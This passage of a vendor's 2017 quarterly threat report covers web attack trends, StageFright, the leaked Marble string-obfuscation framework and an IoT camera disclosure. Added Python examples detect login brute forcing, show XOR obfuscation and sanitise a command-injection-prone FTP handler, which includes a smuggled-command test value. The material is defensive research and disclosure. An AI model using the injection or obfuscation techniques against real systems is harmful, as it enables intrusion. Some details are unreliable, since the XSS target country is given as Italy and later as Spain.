Rather than analyzing each individual exploit (see the links in the chart if you want more detail), let’s look at quarter-over-quarter differences and overall trends.
Quarter-Over-Quarter Attack Analysis

In Q1, six of the network attacks from the previous quarter return to our top list. At a high level, not much has changed with these six attacks. Almost all of them moved up on the list, and they generally retain the same order. The only exception is the “Suspicious HTML iframe tag” issue, which dropped two spots to ninth. While web-based attacks still dominate the top threats, the scale has tipped from web client attacks to web server attacks, which we will talk about next.
The Web Battleground Shifts to Servers

Last quarter, web attacks dominated our top ten, filling all the spots on our list. This quarter, web threats still dominate, but a mobile exploit cracked the top 10 for the first time. This quarter also saw a shift in the type of web attacks. In Q4 2016, 73% of the top web attacks targeted web clients (the browser and its supporting software), not web servers. Now, only three of the nine web threats on the list target web clients. In the end, 82% of the top network attacks target web servers (or web-based services).

This marks a significant shift in the mix of web server vs. client threats, and that trend extends into the top 20 as well. While a few more client vulnerabilities show up in the wider top 20 list, it also includes more web server flaws. We don’t think drive-by download style attacks will go away, but it appears attackers have focused their efforts and tools on exploiting web server vulnerabilities. A couple of new web server attacks also made the list, which we’ll cover next. With the increase in web server attacks, we recommend you harden your web servers, use a firewall to limit access to any internal web services, and keep your server software up to date with the latest patches.
Web Application Attacks Move Up

Though many of the web vulnerabilities in the top threat list remain the same, Q1 saw two newcomers: a web application vulnerability and a login brute force attack.

1. WEB Cross-site Scripting – 36: A web application (app) vulnerability is a flaw in the actual web app, and not in the server software. This could include the code making up a common web framework you use, or the custom code you created specifically for your own web apps. Common examples of web app flaws include cross-site scripting (XSS), local and remote file inclusion, SQL injection (SQLi), cross-site request forgery (CSRF), and many more.

Last quarter, not a single web app vulnerability made the top 10. This quarter, an XSS vulnerability rose to number five. An XSS attack allows an attacker to interact with a web app as if they are the intended end user. However, attackers typically need to trick you into clicking a specially crafted link for the attack to work. If you do fall for the link, the attacker can gain access to that web app’s cookies, and any of your other content on that site.

WEB Cross-site Scripting – 36 is one of many broad signatures to detect generic cross-site scripting attempts against your users. It’s interesting to see web app attacks reach the top 10. We found three additional web app attacks in the top 20 as well. Protecting against XSS attacks is a twofold process, since the vulnerability lies in a server web app, but the attack targets a web client. For web app administrators, you should visit OWASP.org to learn how to develop secure web apps (a broad topic we can’t cover in a short report). For web users, you should be very careful clicking unusual links.

2. WEB Brute Force Login – 1: While it doesn’t technically catch a web app vulnerability, the Brute Force Login IPS rule does catch an attack that targets the login pages of web applications. If you don’t program login throttling into your web application, attackers can use tools like THC Hydra or the Burp Suite to try to brute force user accounts on your website. This IPS rule can catch web login brute force attempts by looking for repeated connections from the same source address.

With the increase in web app vulnerabilities in Q1, we recommend web administrators audit their source code. As mentioned earlier, OWASP.org is a great resource for learning about protecting your web applications.
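As an added example (our own, not WatchGuard’s IPS logic or any project’s code), the following Python implements both sides of the brute force advice above: a per-source sliding-window login throttle that a login handler could call before checking a password, and a detector that applies the same repeated-connection heuristic the IPS rule uses to web server access-log lines. The log lines, addresses, the /login path and the thresholds are constructed for the example.

```python
import re
from collections import defaultdict, deque
from datetime import datetime

# Constructed access-log lines (common log format); not Firebox Feed data.
# 203.0.113.7 hammers the login form, 198.51.100.9 logs in once normally.
SAMPLE_LOG = """\
203.0.113.7 - - [02/Feb/2017:10:00:01 +0000] "POST /login HTTP/1.1" 401 512
198.51.100.9 - - [02/Feb/2017:10:00:02 +0000] "GET /login HTTP/1.1" 200 1204
203.0.113.7 - - [02/Feb/2017:10:00:02 +0000] "POST /login HTTP/1.1" 401 512
203.0.113.7 - - [02/Feb/2017:10:00:03 +0000] "POST /login HTTP/1.1" 401 512
198.51.100.9 - - [02/Feb/2017:10:00:04 +0000] "POST /login HTTP/1.1" 302 0
203.0.113.7 - - [02/Feb/2017:10:00:04 +0000] "POST /login HTTP/1.1" 401 512
203.0.113.7 - - [02/Feb/2017:10:00:05 +0000] "POST /login HTTP/1.1" 401 512
203.0.113.7 - - [02/Feb/2017:10:00:06 +0000] "POST /login HTTP/1.1" 401 512
203.0.113.7 - - [02/Feb/2017:10:00:07 +0000] "POST /login HTTP/1.1" 401 512
203.0.113.7 - - [02/Feb/2017:10:00:41 +0000] "POST /login HTTP/1.1" 200 2048
"""

LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"


class LoginThrottle:
    """Sliding window: at most `limit` login attempts per source within `window` seconds.

    Called from a login handler it is the throttling the text recommends; applied to a
    log it is the same repeated-connection heuristic an IPS rule uses for detection.
    """

    def __init__(self, limit: int = 5, window: float = 60.0):
        self.limit = limit
        self.window = window
        self._attempts = defaultdict(deque)  # source -> timestamps of recent attempts

    def check(self, source: str, now: float) -> bool:
        """Record an attempt at time `now`; return False if this source should be blocked."""
        q = self._attempts[source]
        while q and now - q[0] > self.window:  # forget attempts that left the window
            q.popleft()
        q.append(now)
        return len(q) <= self.limit


def detect_login_bruteforce(log_text: str, limit: int = 5, window: float = 60.0,
                            login_path: str = "/login") -> dict:
    """Return {source: timestamp of first attempt over the limit} for POSTs to login_path."""
    throttle = LoginThrottle(limit, window)
    flagged = {}
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m or m["method"] != "POST" or m["path"] != login_path:
            continue  # only login submissions count; viewing the form does not
        ts = datetime.strptime(m["ts"], TS_FMT).timestamp()
        if not throttle.check(m["src"], ts) and m["src"] not in flagged:
            flagged[m["src"]] = m["ts"]
    return flagged


if __name__ == "__main__":
    print(detect_login_bruteforce(SAMPLE_LOG))
```

Counting only POSTs to the login path keeps ordinary page views from tripping the rule; keying on the source address is what the IPS signature does, and a throttle in the application itself can additionally key on the account name to catch attempts spread across many sources.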
StageFright Returns to the Spotlight

As previously mentioned, this quarter included the first mobile-specific exploit to crack the top threats list. StageFright is an exploit that targets Android mobile devices, and it first earned notoriety in 2015 when researchers publicly disclosed it prior to the Black Hat security conference. Specifically, StageFright is a buffer overflow vulnerability in the Android libStageFright system module, responsible for handling video messages in Android mobiles. By sending a carefully crafted video message, an attacker can exploit this buffer overflow to either execute arbitrary code on the mobile device with full root privileges, or at least cause the device to crash. You can learn more about it in this Daily Byte video.

Over the course of 2015, various Android platforms patched StageFright. However, not all users or vendors keep their Android installs up to date, so many mobile devices may remain vulnerable. Our StageFright signature catches some of the malicious MP4 files used to trigger this video-handling vulnerability. It’s interesting to see this mobile threat make our top attack list. Nearly two years later, not only is StageFright still present, but it’s prolific.

If you are worried about this mobile threat, we highly recommend upgrading your Android operating system (if it’s not patched already). Barring that, some third-party texting applications can mitigate the risk of StageFright by preventing mobile devices from processing video messages automatically. These applications will instead ask whether you want to download and play video messages. You should train your users to treat all unsolicited video messages as suspicious, and avoid clicking links or downloading files you don’t expect.

In summary, the web is still the battleground, but the conflict has shifted from client-side vulnerabilities to server-side ones. If you are a web administrator, use this as an excuse to circle back and reevaluate your security for web servers and applications.
By Source (WP:NFCC#4), Fair use, https://en.wikipedia.org/w/index.php?curid=47364979
Geographic Attack Distribution

The general regional attack trends we saw in Q4 2016 continued this quarter, with the majority of the top network attacks happening in EMEA. We did see marginally fewer attacks in APAC and more in the Americas, but overall, the regional trends look very much like the normalized ones from the last report.

Besides the overall regional trend, our feed data also shows interesting country-specific nuances between the individual top attacks.

• 96% of suspicious iframes were detected in North America. The Suspicious HTML iframe threat overwhelmingly affected North America, with 96% of the hits falling in the U.S. and Canada. Iframes are legitimate HTML tags designed to create frames on a web page. However, web attacks often leverage malicious iframes to redirect victims to a malicious site. If an attacker can hijack a legitimate website, they often use iframes to force that site’s visitors to another site hosting their web exploit kit (EK). We suspect these hits have to do with increased web attack campaigns in the U.S. and Canada.

• The top cross-site scripting (XSS) attack targeted Italy 90% of the time. We haven’t attributed it to a specific campaign, but most XSS attacks in our top threat list affect victims in Italy.

• NGINX is a popular, open-source web and email proxy server. The NGINX vulnerability in our top 10 is an old, but serious, flaw from four years ago. While not as dominant as the examples above, 53% of the “NGINX HTTP_parse_chunked buffer overflow” detections come from Germany. The remaining hits are spread between 17 other countries.

• Likewise, 46% of “JavaScript Obfuscation in EKs” hits were found in the U.S. While that may not seem like an overwhelming majority, the remaining hits were spread sparingly across 45 other countries.

• Finally, 73.6% of the tnftp attacks are split between Great Britain (42.6%) and Australia (31%). By the way, tnftp is a popular FTP client for BSD platforms. Though it is an FTP client, this vulnerability involves how it connects to HTTP URLs. We are not sure why attackers are primarily targeting Great Britain and Australia with these tnftp attacks. Other than sharing a mutual historical ancestry, these countries have little in common.
Figure 8: Malware detection by region (pie chart): EMEA 63.3%, Americas 32%, APAC 4.7%.
Though some attacks are global, others target various countries differently. You can learn a lot from this regional nuance. For instance, our data shows that if you live in North America, you should look out for web-based attacks and drive-by download campaigns that leverage malicious exploit kits. Meanwhile, if you’re in Spain, beware of XSS attacks, and train your users to avoid clicking suspicious links. Finally, if you live in the UK or Australia, be sure you have updated tnftp.
• Malicious JavaScript primarily arrives in emails. Like the previous quarter, we saw a significant amount of malicious JavaScript in Q1. JavaScript was designed for the web, so you might expect to encounter it more there. However, we saw more malicious JavaScript in email. Though attackers do exploit malicious JavaScript with their web-based EKs, 97.2% of the malicious JavaScript we saw arrived in email. These evil emails tend to include compressed Zip attachments, which hide malicious .JS files. As mentioned in the last report, this is a common delivery vector for ransomware like Locky.

• Linux malware is sent over the web. In our Malware Trends section, we mentioned that we saw a lot of Linux-based threats in Q1. These Linux threats were overwhelmingly delivered over the web (99.99%), with only eight of the 419,367 instances arriving via email or FTP. This makes sense if you think about how automated Linux and IoT bots work. As seen in the screenshot sample earlier in this report, many malicious Linux scripts simply use the “wget” command to grab other malicious tools over an everyday web connection.

• Brazilian banking attack sends malicious Java over email. Like JavaScript, Java is one of the things you might expect to see more over the web. However, 99.9% of the Java/Downloader malware arrived over email. As mentioned before, this attack occurred almost exclusively in Brazil, which suggests this malware is associated with a well-known attack campaign targeting Brazilian banks. The attackers behind that campaign send phishing emails that contain malicious .Jar files; sometimes directly attached to the email, but also often compressed within a Zip file. The attackers use a malicious Java downloader because it allows them to target both PCs and Macs.

• The Bitcoin mining trojan was entirely delivered via FTP. As mentioned earlier, Generic36.AAVT is associated with Bitcoin mining trojans. This threat was the only malware to buck the trend, and not get delivered over email or the web. It was almost exclusively FTP-based, with one exception out of 77,704 instances. We’re not entirely sure why this is; however, many traditional bots did use FTP to download additional payloads. We theorize that this could be another threat adding a bitcoin miner to a victim’s computer as a secondary payload.
Firebox Feed Statistics: Defense Learnings

We’ve shared several small defensive tips throughout this section, but here are three defense strategies for some of the top-level trends identified by Q1’s Firebox Feed data:

1. Harden your Linux servers and IoT devices. Three, if not four (if you include PERL/ShellBot), of the top ten Q1 malware variants target Linux systems. We suspect this increase comes from attackers launching automated attacks against weak IoT devices. Manufacturers focusing on usability and affordability over security have released a huge number of incredibly insecure IoT devices to the masses. Consumers with little security knowledge often connect these devices to the Internet without any firewall, allowing attackers easy access. Open Telnet and SSH combined with weak passwords allow attackers to quickly infect swaths of hosts. At the very least, we recommend you firewall your IoT devices and Linux servers from the Internet. Avoid opening access to command line interfaces without additional authentication or security mechanisms like VPN. Change your default passwords and update your software or firmware as often as possible.

2. The web battleground has shifted towards servers. In Q4, we saw many browser-based attacks. However, this quarter we saw more web server attacks. Spend some time hardening your web servers, and don’t forget any other services with web-based interfaces. Hardening servers involves locking down permissions, limiting resource exposure, and making sure the server’s software is fully patched. You should also audit your web applications for programmatic vulnerabilities. Web application security is a complex topic, but we recommend you visit OWASP.org for a wealth of practical tips.

3. Traditional AV misses 38% of malware. For the second quarter in a row, we have seen our legacy AV solution miss a lot of malware that our more advanced solution can catch. In fact, the miss rate has gone up from 30% to 38%. Nowadays, cyber criminals use many subtle tricks to repack their malware so that it evades signature-based detection. If you want to block most malware, you need to deploy an advanced malware solution. These anti-malware solutions can often detect never-before-seen zero day malware using more proactive detection techniques, such as behavior analysis and machine learning. If you’re a WatchGuard customer, APT Blocker catches the malware that traditional AV misses. If you don’t have an advanced malware solution, you’ll likely miss more than one third of threats online.
Top Security Incidents
Our goal with this section of the report is to introduce new research and technical detail that you didn’t
already hear from the news, or other research sources. This quarter, we cover the Marble framework from
the CIA Vault 7 leaks.
The CIA Vault 7 Leaks

On March 7, 2017, WikiLeaks began releasing a series of leaks from the U.S. Central Intelligence Agency (CIA) code-named “Vault 7.” The initial leak included descriptions and details of the CIA’s covert hacking program, including stockpiles of zero day exploits. The exploits targeted unpatched vulnerabilities in Android and iPhone devices, Smart TVs, and traditional desktop and server operating systems like Windows, OS X, and Linux. While the leaks contained many details for ongoing CIA projects, WikiLeaks consciously held back actual source code and proof of concept (POC) exploits from the public, instead offering to share them with affected manufacturers for analysis.
Two weeks after the first Vault 7 leak, WikiLeaks published a second release titled Dark Matter. The Dark Matter
release disclosed several rootkit tools the CIA used to gain persistence on Apple computers by infecting the
firmware. The leak included the user manual for a modified Thunderbolt-to-Ethernet adapter, code-named the
“Sonic Screwdriver,” capable of bypassing EFI/UEFI protections on the target host to facilitate installation of
the rootkit. Dark Matter also disclosed similar tools for infecting Apple’s iOS mobile operating system, dating
back to 2008.
For sophisticated hackers, covering your tracks is one of the most important parts of an attack. Stealing sensitive information does you no good if investigators can clearly trace the attack back to you. The act of investigating an attack, and analyzing its artifacts, is called computer forensics. On March 31, WikiLeaks continued their “Vault 7” leaks with the release of the CIA’s anti-forensics tool, called the Marble framework. The leak included Marble’s source code and user documentation.
A Technical Analysis of the Marble Framework

When malware authors write source code, they often include strings of text along with the regular computational instructions. Such strings can include file paths, Windows registry key names, and sometimes even hard-coded words or passwords. When they compile their source, these strings remain present in the executable, for anyone to find.

When analyzing malware, forensic investigators usually first check executables for any human-readable strings, which may provide clues about the malware and its origins. The CIA primarily designed the Marble framework to obfuscate these strings of text, in hopes of preventing investigators from linking CIA malware to a specific developer (i.e. the CIA).
Every quarter, several major security stories make the headlines. Some of these stories involve well-known products or services, or simply have a major effect on the security of the overall industry. The media does a great job informing the public of these issues, but they don’t always dig into, or research, the technical details.
The framework includes several modules with different purposes. The Mibster module looks for strings marked
for obfuscation and performs the actual scrambling. The Validator module checks the compiled executable file
and confirms that all the marked strings were successfully scrambled. Finally, the Mender module reverts the
source code back to its original state in the event of an error, or if manually requested by the malware author.
To understand the Marble framework, you must first understand how programming languages like C and C++
store strings of text. If you were developing a new ransomware variant, you probably would want to include
a function that creates a text file with a ransom note on the victim’s desktop. You might include the string of
text, “YOUR FILES ARE ENCRYPTED”, inside this text file. In order for your ransomware to create that note, it
would have to include that string of text in its source code.
C and C++ store string variables as an array of individual characters, terminated by a null byte (C++ also includes a variable data type specifically for strings, which we’ll ignore).
Figure 9: String as character array storage example
Each character in the character array takes up 8 bits or 1 byte of memory, which is large enough to store any letter in the English alphabet. Other writing systems, such as Cyrillic, require multiple bytes for each character. The wchar_t (wide character) data type allows C and C++ to use 16 bits or 2 bytes of storage for each character. To store the Russian string “шифровать” (roughly “encrypt” in English), we would use an array of wide characters.
Figure 10: String as wide-character array storage example
The Marble framework defines two new data types for string storage. The “CARBLE” data type is 1-byte long
and matches up to the original “char” data type, while the “WARBLE” data type is 2-bytes long and matches
up to the original “wchar_t” data type. Strings that are defined using the new CARBLE and WARBLE data
types are obfuscated by the framework when the source code is compiled into an executable.
Figure 11: Marble framework new string storage data types
When using the Marble framework, a malware author first chooses which of the different obfuscation algorithms – or “Marbles” as the CIA calls them – they wish to use. The framework contains 106 different algorithms by default, 48 using C++ and 58 using C. The documentation also includes instructions for adding additional algorithms.
After selecting the pool of obfuscation algorithms, the malware author adds the framework to their project,
and includes instructions for the compiler to run Mibster (the obfuscation module) during compilation. Now
the malware developer can use the newly defined CARBLE and WARBLE data types to flag strings for obfus-
cation by Mibster.
When the malware author compiles their code, Mibster chooses an obfuscation algorithm from the pool, and then notes all the source files containing the CARBLE and WARBLE data types. It creates a “gold copy” (unmodified) of those files so it can safely revert to the originals in case of an error during obfuscation.
Next, Mibster parses these files, looking for strings using the CARBLE and WARBLE data types. When it locates them, it scrambles each string using the chosen obfuscation algorithm. It replaces the original with the newly scrambled string and additional de-obfuscation code. The de-obfuscation code allows the compiled executable (malware) to retrieve the original string when it needs it.
After Mibster completes the obfuscation process, the framework validates the output to confirm all the marked
strings were scrambled. If it encounters any errors, the Mender module reverts the source code back to its
original (using the gold copy files).
In the end, the Marble framework scrambles all the human-readable strings within an executable, making it
difficult for a forensic investigator to learn anything about the author from these strings.
Marble Obfuscation Algorithms

As for the obfuscation algorithms themselves, each algorithm generates a random key of a different size depending on the algorithm used.
Figure 12: Obfuscation random key generation
As Mibster feeds a string through the algorithm, it modifies each character using a character from the key.
The modification either adds or subtracts the value of the key with the character being modified (bumping),
or XORs it (Exclusive OR).
Figure 13: Obfuscation XOR algorithm
As mentioned before, the de-obfuscation code is the internal mechanism that allows the compiled executable to read an obfuscated string by returning it to its original state while the program is running. One other difference between the available algorithms is how they implement this de-obfuscation code. Some place the de-obfuscation code alongside the scrambled string as a computational loop; others call a separate function stored elsewhere in the executable.
Figure 14: De-obfuscation code generation
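To make the string-storage and obfuscation descriptions above concrete, here is an added illustration in Python (our own code, not code from the leak or from WatchGuard). It lays out a constructed narrow (char) string and a constructed wide (wchar_t) string the way a compiler would, models the two kinds of “marble” the text describes (bumping, i.e. add/subtract, and XOR) with a random key that repeats across the string, and contrasts what a `strings`-style first pass recovers before and after scrambling, which is exactly the forensic step the framework is built to defeat. The 2-byte wchar_t layout (UTF-16LE) follows the text and matches Windows; the key size, the fixed demo key, the repeating-key schedule and the function names are assumptions of this example, not details of the framework.

```python
import os
import re

# Constructed sample strings for the demo (not taken from the leaked framework).
NARROW = "YOUR FILES ARE ENCRYPTED"   # would be declared as a CARBLE (char) array
WIDE = "шифровать"                    # would be declared as a WARBLE (wchar_t) array

# Fixed key so the demo is repeatable; a real build would call generate_key().
DEMO_KEY = bytes.fromhex("5aa317c8992e7041")


def c_string_bytes(text: str, wide: bool = False) -> bytes:
    """Lay the string out as the compiler would: 1 byte per char for a char array,
    2 bytes per character (UTF-16LE, the 2-byte wchar_t assumed here) for a wide
    array, each followed by a null terminator."""
    if wide:
        return text.encode("utf-16-le") + b"\x00\x00"
    return text.encode("ascii") + b"\x00"


def extract_strings(blob: bytes, min_len: int = 4) -> list:
    """What a `strings`-style first pass shows an investigator: runs of printable ASCII."""
    pattern = rb"[\x20-\x7e]{%d,}" % min_len
    return [m.group().decode("ascii") for m in re.finditer(pattern, blob)]


def generate_key(size: int) -> bytes:
    """Random key of whatever size the chosen marble uses (Figure 12)."""
    return os.urandom(size)


def marble_xor(data: bytes, key: bytes) -> bytes:
    """XOR marble: each byte is XORed with the key byte at its position (key repeats).
    XOR is its own inverse, so the same call also de-obfuscates."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def marble_bump(data: bytes, key: bytes, reverse: bool = False) -> bytes:
    """Bumping marble: add the key byte to each data byte mod 256; subtract to reverse."""
    sign = -1 if reverse else 1
    return bytes((b + sign * key[i % len(key)]) & 0xFF for i, b in enumerate(data))


def obfuscate(data: bytes, key: bytes, algo: str) -> bytes:
    """What Mibster does to a flagged string at build time."""
    if algo == "xor":
        return marble_xor(data, key)
    if algo == "bump":
        return marble_bump(data, key)
    raise ValueError(f"unknown marble {algo!r}")


def deobfuscate(data: bytes, key: bytes, algo: str) -> bytes:
    """The de-obfuscation code the program runs when it needs the string (Figure 14)."""
    if algo == "xor":
        return marble_xor(data, key)
    if algo == "bump":
        return marble_bump(data, key, reverse=True)
    raise ValueError(f"unknown marble {algo!r}")


def investigator_view(key: bytes, algo: str) -> dict:
    """Compare a `strings` pass over the plain layout with one over the scrambled
    layout, and confirm the program can still recover the originals at runtime."""
    clear = c_string_bytes(NARROW) + c_string_bytes(WIDE, wide=True)
    scrambled = obfuscate(clear, key, algo)
    return {
        "clear_strings": extract_strings(clear),
        "scrambled_strings": extract_strings(scrambled),
        "round_trip_ok": deobfuscate(scrambled, key, algo) == clear,
    }


if __name__ == "__main__":
    for algo in ("xor", "bump"):
        print(algo, investigator_view(DEMO_KEY, algo))
```

Note what the demo does and does not show: the wide Cyrillic string never appears in the `strings` output even unscrambled, because every other byte of its UTF-16 layout is non-printable, which is why investigators also run wide-string extraction. The key and the decoder ship inside the executable, so a scrambled string is always recoverable by someone who finds the decoder or watches the program at runtime; the framework only defeats the cheap first-pass triage, which is the reason behavior-based analysis matters for the defender.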
The leaked Marble framework is a fairly complex tool used to throw off savvy forensic investigators, not normal users. However, the average administrator can still draw out a few defensive learnings from this example.

Marble Framework Defense Learnings

1. Obfuscation can also help malware hide from detection. There’s a big difference between executable code obfuscation and anti-forensic string obfuscation. The Marble framework provides the latter, and doesn’t really help malware evade detection. It just makes it harder for investigators to attribute the malware. That said, this incident reminds us that criminal attackers also use code obfuscation to hide malware from antivirus (AV) software. Signature-based AV solutions looking for certain code patterns won’t find them if the code is obfuscated. This highlights the necessity for more advanced malware detection solutions, such as behavior-based sandboxes, to detect obfuscated malware.

2. Beware of false flag attacks in nation-state attacks. The user documentation released in the Vault 7 leak confirms that the Marble obfuscation tools support foreign languages. This suggests that the CIA could leverage this tool to obfuscate their malware to appear like it comes from another country, something experts call a false flag attack. While there is no direct evidence that the CIA used Marble in this way, you should be aware of the possibility.

3. Expect false flags to trickle down to criminal malware. More importantly, be aware that the release of the Marble framework now enables even unsophisticated criminals to obfuscate their malware in a way that could be falsely attributed to the CIA. Malware authors could even backdate the compile timestamp to make their malware appear as though it was created before the public release of the framework. We expect some criminal malware to start using string obfuscation to throw off investigators.
WatchGuard Threat Lab’s IoT Research Project
In response to the rapid spread of the Mirai botnet, and the perceived general
insecurity of new consumer IoT devices, WatchGuard’s Threat Lab launched
an ongoing project to analyze various IoT devices for security flaws. Some
of our test targets included Wi-Fi cameras, fitness accessories, and even a
wireless egg tray. Any security flaws our researchers find are responsibly
disclosed to device manufacturers for patching. Furthermore, we wait 90
days before full disclosure in the event that vendors don’t respond to our
disclosure notice.
In this report, we finally share some zero day vulnerabilities that were discovered in early January. Since the vendor did not respond to our researcher’s disclosure, we had to wait the full 90 days before sharing these details.
Responsible Disclosure: Ouvis C2 HD Security Camera
As a part of our ongoing IoT vulnerability research project, one of the
recently tested devices included the Ouvis C2 HD Wireless Security Camera.
This is a wireless camera that includes Android, iOS and browser-based
remote viewing.
Open Telnet Access
When first examining new network devices for vulnerabilities, researchers
typically start by port scanning the device to identify any open services.
Figure 15: nmap port scan output
A port scan of the Ouvis camera showed open Telnet on TCP/23 and an HTTP web server running on TCP/81 – a
non-standard port for web servers. We immediately noted the open Telnet access as a potential security vulnerability,
since Telnet offers no encryption. There is no reason for consumer IoT devices to allow Telnet-based management
access, especially when more secure options like SSH exist. Malicious applications like the Mirai botnet thrive because
of open Telnet access combined with weak default passphrases.
After detecting an open Telnet port, a penetration (pen) tester typically tries to obtain privileged command-line
access to the device through Telnet. To gain such access, the pen tester needs to figure out the username and
password for the ‘root’ account on the device. Since these CLI interfaces are often left in for diagnostic purposes,
manufacturers don’t share credentials for them, and don’t necessarily intend them for the customer’s use.
Brute forcing to the rescue. With respect to authentication, a brute force attack is the act of rapidly trying different username and password combinations against a login. Using an application called THC Hydra, our researcher attempted to brute force the credentials for the device. To speed up the attack, he configured Hydra to use a wordlist containing thousands of common passphrases. After several hours of trying different username and password combinations, Hydra was unable to find working credentials.
After failing to brute force credentials, the threat research team was forced to find other methods for obtaining root
access. The next step involved disassembling the camera in search of console serial access. Luckily, one of the circuit
boards in the camera had UART pads.
Figure 16: hydra password brute force via
Figure 17: Empty UART pads
After soldering a USB-TTY to UART cable to the empty pads, the team could access the camera’s
serial console (115200 baud rate).
Figure 18: Camera U-Boot output
Figure 19: Modifying the U-Boot configuration
Figure 20: Hashed root password
After halting the boot process, our researcher modified the U-Boot configuration to initialize a shell after
mounting the filesystem.
Our researcher was finally greeted with a command line shell for the camera. Once connected,
he checked /etc/passwd for any user accounts and easily found the root account and its hashed password.
Summary
Access to a password hash allows for faster, more efficient offline password cracking. In one last attempt to obtain the
root password, our team fed the passwd file through hashcat, a popular hash cracking application. After several days of
cracking, attempting every possible character combination up to and including eight characters, hashcat failed to yield
any results.
We still consider this open Telnet access a weakness, especially since the device includes a hard-coded root password (which some might call a backdoor account). The good news is the root password has withstood several significant cracking attempts so far. It seems the device manufacturer was at least conscious enough to use a strong password. That said, if anyone ever recovers this password, it could provide a backdoor to all these devices. In fact, we have since correlated with other researchers’ analysis, and have confirmed that all these Ouvis cameras share the same root password hash. If the password ever leaks, it will provide attackers with unrestricted access to these devices.
Authenticated Remote Code Execution Vulnerability

In auditing IoT devices like webcams, our research team frequently finds web application flaws in web management portals due to un-sanitized inputs. After finding a remote code execution vulnerability in one of the web management pages of a similar IoT camera, the team checked the same location (FTP backup settings) for this Ouvis camera, and found the exact same vulnerability (see our Q4 report for more details on the previous issue).
Figure 21: Hashed root password
A packet capture of DNS traffic from the camera showed an attempted name resolution for ‘rce.bad’, confirming the
remote code execution vulnerability.
As it turned out, the Common Gateway Interface (CGI) handler for FTP configuration (set_ftp.cgi) did not sanitize
the user input before saving it to an FTP upload script located at /tmp/ftpupload.sh. The camera runs this script as a
privileged user, which in turn executes any command an attacker injects into this un-sanitized input (in our example, the
ping command).
This serious vulnerability could allow attackers to execute any command on this camera as root, thus elevating their
privileges. However, this is an “authenticated” vulnerability, meaning the attacker must already have valid management
credentials in order to exploit this flaw.
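To make the set_ftp.cgi defect concrete from the fixing side, here is an added example in Python (ours, not the camera’s firmware, whose source we did not see): a hypothetical stand-in for an FTP-settings handler that renders the upload script a privileged process later runs. The first renderer interpolates the form fields verbatim, which is the un-sanitized-input pattern described above; the hardened one validates the host against an allow-list (an IP literal or an RFC 1123 hostname) and shell-quotes every field so each can only ever be one argument of the one intended command. The `ftpput` invocation, the field names and the /tmp/snapshot.jpg path are assumptions for illustration.

```python
import ipaddress
import re
import shlex

# Hypothetical stand-in for a camera's FTP-settings CGI handler (not the Ouvis code).
# It renders the shell script a privileged process later runs to upload snapshots;
# the ftpput command line and /tmp/snapshot.jpg are assumptions for the example.

# RFC 1123 hostname: dot-separated labels of letters, digits and hyphens,
# no label starting or ending with a hyphen, at most 63 chars per label.
HOSTNAME_RE = re.compile(
    r"^(?=.{1,253}$)(?!-)[A-Za-z0-9-]{1,63}(?<!-)"
    r"(?:\.(?!-)[A-Za-z0-9-]{1,63}(?<!-))*$"
)


def render_ftp_script_unsafe(host: str, user: str, password: str) -> str:
    """The defect described above: form fields dropped verbatim into a shell script,
    so any shell metacharacter in a field becomes part of the script's syntax."""
    return f"#!/bin/sh\nftpput -u {user} -p {password} {host} /tmp/snapshot.jpg\n"


def validate_host(host: str) -> str:
    """Allow-list check: accept an IPv4/IPv6 literal or an RFC 1123 hostname,
    reject everything else (including anything containing shell syntax)."""
    try:
        ipaddress.ip_address(host)
        return host
    except ValueError:
        pass
    if HOSTNAME_RE.match(host):
        return host
    raise ValueError(f"invalid FTP host: {host!r}")


def render_ftp_script_safe(host: str, user: str, password: str) -> str:
    """Hardened form: validate the host against the allow-list, then shell-quote every
    field. Quoting is the second line of defence for fields that cannot be allow-listed."""
    host = validate_host(host)
    return (
        "#!/bin/sh\n"
        f"ftpput -u {shlex.quote(user)} -p {shlex.quote(password)} "
        f"{shlex.quote(host)} /tmp/snapshot.jpg\n"
    )


def handle_set_ftp(form: dict) -> dict:
    """CGI-style entry point: returns the script to install, or an error without
    writing anything, so bad input never reaches the privileged script at all."""
    try:
        script = render_ftp_script_safe(
            form.get("host", ""), form.get("user", ""), form.get("pass", "")
        )
    except ValueError as exc:
        return {"ok": False, "error": str(exc)}
    return {"ok": True, "script": script}


if __name__ == "__main__":
    # Constructed input: a hostname followed by a second shell command.
    hostile = "ftp.example.com; echo injected"
    print(render_ftp_script_unsafe(hostile, "cam", "secret"))  # second command survives
    print(handle_set_ftp({"host": hostile, "user": "cam", "pass": "secret"}))  # rejected
```

The order matters: validation against a strict allow-list comes first, because it rejects the whole class of unexpected input; `shlex.quote` is kept for the free-form fields and as a backstop. On a device like this, running the upload as an unprivileged user would further limit what a bypass could do, which is the privilege point the text makes.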
Conclusion

After confirming both vulnerabilities, our researchers immediately submitted a report to Ouvis via their support contact. Ouvis did not respond to our disclosure attempts over a 90-day period.

After 60 days, a separate researcher, Pierre Kim, disclosed the same and further vulnerabilities in a series of cameras appearing to be manufactured by the same OEM supplier. Because the Ouvis C2 was not present in Pierre Kim’s list of affected models, we continued the originally planned 90-day disclosure period. After no contact from the vendor, we responsibly disclosed this research publicly on April 24, 2017.
Timeline
• 2 January 2017 – Vulnerabilities discovered
• 4 January 2017 – Reported to manufacturer
• 3 February 2017 – Manufacturer contacted a second time
• 6 March 2017 – Manufacturer informed of imminent public disclosure
• 8 March 2017 – Similar vulnerabilities zero day’d by Pierre Kim
• 3 April 2017 – Manufacturer contacted a final time
• 24 April 2017 – Public Disclosure
WatchGuard Threat Lab’s IoT Research Project
WatchGuard Threat Lab’s Research Defense Learnings
Our research shows consumer IoT devices continue to ship with weaknesses and security vulnerabilities. At
best, these issues could result in loss of privacy for consumers. At worst, they might allow attackers to take
over these devices, gaining a foothold into your internal network.
Consumers should take steps to secure the IoT devices they purchase, as well as urge device manufacturers to
focus on security. At a minimum, here are three IoT defense strategies that help.
1. Avoid exposing CLI management interfaces to the Internet
Most IoT devices have no legitimate need for CLI access via Telnet or SSH. If you port scan your IoT device
and find open CLI access, take extra caution while deploying it. Implement network firewall rules to block
inbound Telnet and SSH access not only from the Internet, but from other internal networks as well (to prevent
attack pivoting).
2. Avoid IoT devices with hard-coded backdoor accounts
Some manufacturers ship IoT devices with set accounts that have the same hard-coded password for all devices.
